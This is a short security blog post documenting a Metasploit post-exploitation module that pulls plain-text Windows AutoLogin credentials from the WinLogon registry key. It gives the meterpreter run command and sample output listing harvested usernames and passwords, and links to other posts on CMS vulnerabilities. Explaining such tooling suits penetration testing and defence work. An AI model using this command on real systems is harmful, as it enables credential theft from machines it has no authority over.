[Metasploit] Post | Windows Gather AutoLogin User Credential Extractor


This module extracts the plain-text Windows user login password in Registry. It exploits a Windows feature that Windows (2K till current Seven) allows a user or third-party Windows Utility tools to configure User AutoLogin via plain-text password insertion in (Alt)DefaultPassword field in the registry location - HKLM\Software\Microsoft\Windows NT\WinLogon. This is readable by all users.

meterpreter > run post/windows/gather/credentials/windows_autologin

[*] Running against John-PC @ session 1
[+] DefaultDomain=DEPT_SALES, DefaultUser=john, DefaultPassword=pa55w0rd
[+] AltDomain=DEPT_HR, AltUser=jack, AltPassword=dr0w55p
[*] Storing data...
[*] Windows AutoLogin User Credentials saved in: /root/.msf4/loot/20110821034449_default_10.23.12.11_windows.autologi_460131.txt

Popular posts from this blog

OxWall 1.1.1 <= Multiple Cross Site Scripting Vulnerabilities (CVE-2012-0872)

Open-Realty CMS 3.x | Persistent Cross Site Scripting (XSS) Vulnerability

Jcow CMS 4.x:4.2 <= , 5.x:5.2 <= | Arbitrary Code Execution